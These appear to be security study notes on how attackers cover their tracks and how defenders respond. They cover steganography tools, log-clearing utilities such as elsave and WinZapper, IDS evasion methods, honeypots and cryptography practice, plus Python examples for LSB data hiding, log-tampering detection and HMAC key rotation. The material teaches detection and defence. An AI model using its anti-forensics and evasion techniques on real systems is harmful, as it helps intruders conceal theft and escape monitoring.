● Caveat for defenders: changing the audit policy is itself logged (Security event 4719), and logs forwarded to a remote collector in real time are out of the attacker's reach, so centralised logging is the standard counter to this whole phase.

🕵️‍♂️ Techniques of Covering Tracks

1. Steganography (Hiding Data in Images/Media)

🔸 What is it?

● Steganography is the art of hiding data inside other files like:
  ○ Images
  ○ Audio
  ○ Text
● Hackers use it to store, or smuggle out, things such as:
  ○ Secret messages
  ○ Login credentials
  ○ Malicious instructions

🔸 Examples:

● Image Hide:
  ○ Hides large amounts of text in image files without increasing the file size.
  ○ Not noticeable in a normal image viewer.
● Blindside:
  ○ Command-line tool for hiding data in BMP images.
● MP3Stego:
  ○ Hides data during MP3 compression.
  ○ Encrypts and compresses the data before embedding it in the bitstream.

🔸 Detection Tools:

● Stegdetect:
  ○ Automatically detects steganographic content in JPEGs.
  ○ Identifies several embedding techniques by their statistical fingerprints.
● Dskprobe:
  ○ A Windows 2000 tool that reads disk sectors directly.
  ○ Can find data hidden at a low level, outside any file the file system shows.
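Why an image viewer shows nothing and why a statistical tool still can: the simplest image technique changes only the least significant bit of each pixel value, so no value moves by more than 1 and the file size is unchanged, but the LSB plane's statistics shift. The embed/extract pair and the crude LSB statistic below are an added example for this page, not code from the original notes or from any of the tools named above; the cover is a constructed grayscale gradient held as raw bytes, and the hidden message is made up.

```python
# Added example (not from the original notes): LSB steganography on raw 8-bit
# pixel bytes, with the size/change invariants and a crude LSB-plane statistic.


def embed(cover: bytes, message: bytes) -> bytearray:
    """Write the message (4-byte length prefix first) into the LSB of each cover byte."""
    data = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("message too long for this cover")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit    # each value changes by at most 1
    return stego


def _read_bytes(stego: bytes, first_bit: int, count: int) -> bytes:
    out = bytearray()
    for i in range(count):
        value = 0
        for j in range(8):
            value = (value << 1) | (stego[first_bit + i * 8 + j] & 1)
        out.append(value)
    return bytes(out)


def extract(stego: bytes) -> bytes:
    length = int.from_bytes(_read_bytes(stego, 0, 4), "big")
    return _read_bytes(stego, 32, length)


def max_pixel_change(cover: bytes, stego: bytes) -> int:
    return max(abs(a - b) for a, b in zip(cover, stego))


def lsb_ones_fraction(data: bytes, n: int) -> float:
    """Share of set LSBs in the first n bytes.  Embedded data pushes this toward
    the bit density of the payload, which is what stego detectors look for."""
    return sum(b & 1 for b in data[:n]) / n


# Constructed cover: a 64x64 8-bit grayscale gradient as raw pixel bytes.
# Every value is even, so its LSB plane is all zeros before embedding.
COVER = bytes((x * 4) % 256 for y in range(64) for x in range(64))
SECRET = b"creds: admin:S3cret!"

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print("recovered:", extract(stego))
    print("size unchanged:", len(stego) == len(COVER),
          " max change per pixel:", max_pixel_change(COVER, stego))
    print("LSB ones before/after:", lsb_ones_fraction(COVER, 200),
          lsb_ones_fraction(stego, 200))
```

Real photographs have noisy LSB planes rather than the all-zero one of this synthetic cover, which is why tools like Stegdetect use statistical tests over the histogram instead of a raw count; the principle is the same.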

2. Event Log Alteration

🔸 Why is it done?

● Even after disabling auditing, previous logs may still exist.
● Hackers clear these logs to remove evidence of past activity.

🔸 Suspicious Indicators:

● A log with very few entries, or with a gap where entries should be, is a sign of tampering.
● On Windows the clearing itself leaves a trace: clearing the Security log writes event 1102 ("The audit log was cleared") as the first entry of the fresh log, and clearing other logs writes event 104 to the System log.

🔸 Tools Used:

● elsave.exe:
  ○ A simple command-line utility to save and clear event logs.
● WinZapper:
  ○ Used to selectively delete entries from the Windows 2000 security log.
● Manual method: Event Viewer can clear an entire log ("Clear Log"), but it cannot delete individual entries, which is why selective tools like WinZapper exist.
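The indicators above turned into detection logic, as an added example for this page (not from the original notes): find the clearing events themselves, find silent stretches, and flag a log that is far sparser than the host normally produces. The event records are constructed to look like what a log collector would hold; the event ids used (1102, 104, 4719, 4624, 4672, 4688) are the standard Windows ones, the thresholds are assumptions.

```python
# Added example (not from the original notes): detection of log clearing and
# audit tampering over a constructed set of Windows event records.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple


@dataclass
class Event:
    time: datetime
    log: str
    event_id: int
    user: str


# What clearing leaves behind: clearing the Security log writes 1102, clearing
# another log writes 104 to System, changing the audit policy writes 4719.
TELLTALE = {
    ("Security", 1102): "Security log cleared",
    ("System", 104): "event log cleared",
    ("Security", 4719): "audit policy changed",
}


def find_clearing(events: List[Event]) -> List[Tuple[datetime, int, str, str]]:
    return [(e.time, e.event_id, e.user, TELLTALE[(e.log, e.event_id)])
            for e in events if (e.log, e.event_id) in TELLTALE]


def find_gaps(events: List[Event], max_gap: timedelta) -> List[Tuple[datetime, datetime]]:
    """Silent stretches longer than max_gap on a host that normally logs steadily."""
    ordered = sorted(events, key=lambda e: e.time)
    return [(a.time, b.time) for a, b in zip(ordered, ordered[1:])
            if b.time - a.time > max_gap]


def is_suspiciously_sparse(events: List[Event], span: timedelta,
                           expected_per_hour: float) -> bool:
    """Fewer than a quarter of the expected volume over the span: the
    'log with very few entries' indicator, with an assumed threshold."""
    hours = span.total_seconds() / 3600
    return len(events) < 0.25 * expected_per_hour * hours


# Constructed sample as a collector would hold it (a normal morning, then a
# service account changes the audit policy, clears both logs and logs on).
T = datetime(2024, 5, 1)
SAMPLE = [
    Event(T.replace(hour=8, minute=0), "Security", 4624, "alice"),
    Event(T.replace(hour=8, minute=5), "Security", 4672, "alice"),
    Event(T.replace(hour=8, minute=30), "Security", 4688, "alice"),
    Event(T.replace(hour=9, minute=0), "Security", 4624, "alice"),
    Event(T.replace(hour=9, minute=2), "Security", 4688, "alice"),
    Event(T.replace(hour=14, minute=5), "Security", 4719, "svc_backup"),
    Event(T.replace(hour=14, minute=10), "Security", 1102, "svc_backup"),
    Event(T.replace(hour=14, minute=11), "System", 104, "svc_backup"),
    Event(T.replace(hour=14, minute=12), "Security", 4624, "svc_backup"),
]

if __name__ == "__main__":
    for when, eid, user, why in find_clearing(SAMPLE):
        print(f"{when:%H:%M} {eid:5} {user:12} {why}")
    print("gaps >2h:", find_gaps(SAMPLE, timedelta(hours=2)))
    print("sparse:", is_suspiciously_sparse(SAMPLE, timedelta(hours=8), expected_per_hour=30))
```

The clearing events are the high-confidence signal (a service account clearing the Security log is an incident until proven otherwise); the gap and sparsity checks catch the case where the attacker used a selective tool and no 1102 was written.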

Additional Security Mechanisms

🔍 1. IDS/IPS (Intrusion Detection/Prevention Systems)

✅ Intrusion Detection Systems (IDS)

● These systems inspect traffic and look for known attack patterns or unusual behaviour.
● An IDS sensor acts like a packet sniffer, monitoring traffic for threats.
● The management console ("command center") notifies the administrator (via email, pager, or phone) when a suspicious event from the security event list is detected.

✅ Intrusion Prevention Systems (IPS)

● An IPS sits inline and automatically takes countermeasures, like blocking traffic, when it detects suspicious flows.
● It automates the response and enables deny-access capabilities against intrusions.

🔄 Types of IDS

🔹 1. Host-based IDS (HIDS)

● Applications that run on a single system/host.
● Filter events and traffic using a signature list specific to the OS.
● Examples:
  ○ Norton Internet Security
  ○ Cisco Security Agent (CSA)
● Limitation:
  ○ Many Trojans and worms can disable a HIDS once they run with sufficient privileges on the host.

🔹 2. Network-based IDS (NIDS)

● Software-based appliances that monitor the traffic of a network segment.
● Designed to detect:
  ○ Network attacks (e.g., against vulnerable services)
  ○ Application-level attacks
  ○ Host-based attacks visible on the wire (e.g., unauthorized logins, access to sensitive files over the network)
  ○ Privilege escalation
  ○ Malware
● Passive system: detects and logs security breaches and sends alerts to the console; it does not block.

🧠 Detection Techniques in IDS

🧬 Signature-Based Detection

● Compares traffic with known attack signatures/patterns.
● A signature identifies one or more packets that collectively indicate an attack.
● Cannot detect attacks for which it has no signature (zero-days, novel variants).

⚠️ Anomaly-Based Detection

● Detects unusual behaviour (e.g., abnormal login patterns, file access).
● Uses baselines of normal user and network activity to flag deviations; prone to false positives until the baseline is tuned.

🎭 IDS Evasion Techniques by Hackers

Technique               Description
Protocol Substitution   Using a different protocol (e.g., UDP instead of TCP) to avoid signature matches written for the expected one.
Session Splicing        Splitting the attack across many small packets so that no single packet matches a signature; the target reassembles the pieces and the attack still works.
Obfuscation             Encrypting or encoding payloads (URL encoding, Unicode), or inserting extra/misleading data, so the bytes on the wire do not look like the signature.
Session Hijacking       Taking over a client's session while desynchronizing the IDS's view of the stream from what the target actually sees.

2. Honeypots (Decoy Systems to Detect Attacks)

📌 Definition & Purpose

● A honeypot is a decoy system placed within a network (usually in the DMZ).
● Created by security professionals to:
  ○ Attract and trap hackers
  ○ Log attacker behaviour
  ○ Divert them away from real systems

🗂️ Key Features

● Logs attacker information like IP address, activities, tools and payloads used.
● Helps in identifying or tracing the hacker during/after an attack.
● Best placement: reachable from the internet (in the DMZ), appearing like a real server.
● A honeypot with a static IP appears more realistic to hackers.
● Because no legitimate user should ever touch it, any connection to it is a high-confidence alert; it must be isolated so that a compromised honeypot cannot be used to pivot into production systems.

🔐 3. Cryptography (For Data Security, Confidentiality, Integrity)

✅ Best Practices

● Cryptographic functions should be implemented on a trusted system (e.g., the server), not in client-side code the attacker controls.
● Protect master secrets (keys, credentials) from unauthorized access.
● Ensure cryptographic modules:
  ○ Fail securely
  ○ Do not leak sensitive information upon failure (for example, no distinct error for "unknown key" versus "bad signature")
● Use standard algorithms from well-reviewed libraries; do not design your own.

🔢 Randomness & Key Management

● Use approved cryptographically secure RNGs (CSPRNGs, i.e. the operating system's random source; in Python the secrets module, not random) for:
  ○ Random numbers
  ○ Random file names
  ○ Random strings, GUIDs, session tokens, etc.
● These must be unguessable if used for security purposes; general-purpose PRNGs are seeded and therefore predictable.
● Establish and follow a cryptographic key management policy and process for:
  ○ Key generation
  ○ Key distribution
  ○ Key storage
  ○ Key rotation and revocation
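Key generation from a CSPRNG, fail-securely verification, and rotation/revocation in one small mechanism, as an added example for this page (not from the original notes): an HMAC-protected cookie value of the kind that stops the cookie manipulation described under Input Manipulation. Each tag carries the id of the key that made it, so old cookies keep verifying after a rotation until that key is revoked. The token format and key-id length are this example's own choices.

```python
# Added example (not from the original notes): HMAC-tagged cookie values with
# a key ring that supports rotation and revocation, using the secrets module.
import hashlib
import hmac
import secrets
from typing import Dict, Optional


class KeyRing:
    """HMAC keys with ids, so tokens survive rotation and die on revocation."""

    def __init__(self) -> None:
        self.keys: Dict[str, bytes] = {}
        self.active: Optional[str] = None

    def rotate(self) -> str:
        # secrets.* draws from the OS CSPRNG.  random.random() is a seeded
        # Mersenne Twister and must never be used for keys or tokens.
        kid = secrets.token_hex(4)
        self.keys[kid] = secrets.token_bytes(32)
        self.active = kid
        return kid

    def revoke(self, kid: str) -> None:
        self.keys.pop(kid, None)
        if self.active == kid:
            self.active = None

    def _tag(self, kid: str, value: str) -> str:
        # The key id is bound into the MAC input so a tag cannot be replayed
        # under a different key id.
        return hmac.new(self.keys[kid], f"{kid}|{value}".encode(),
                        hashlib.sha256).hexdigest()

    def sign(self, value: str) -> str:
        if self.active is None:
            raise RuntimeError("no active key; call rotate() first")
        return f"{self.active}.{self._tag(self.active, value)}.{value}"

    def verify(self, token: str) -> Optional[str]:
        """Return the protected value, or None.  Every failure path returns
        the same None and leaks nothing about which check failed."""
        try:
            kid, tag, value = token.split(".", 2)
            self.keys[kid]                     # KeyError if revoked or unknown
        except (ValueError, KeyError):
            return None
        if not hmac.compare_digest(self._tag(kid, value), tag):   # constant time
            return None
        return value


if __name__ == "__main__":
    ring = KeyRing()
    first = ring.rotate()
    cookie = ring.sign("role=user")
    print("cookie:", cookie)
    print("verify:", ring.verify(cookie))
    print("tampered:", ring.verify(cookie.replace("role=user", "role=admin")))
    ring.rotate()
    print("after rotation:", ring.verify(cookie))
    ring.revoke(first)
    print("after revocation:", ring.verify(cookie))
```

The ring is the policy from the list above made concrete: generation (secrets), storage (keys live only server-side), rotation (new active key, old ones still verify) and revocation (drop the key and every token under it fails closed).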
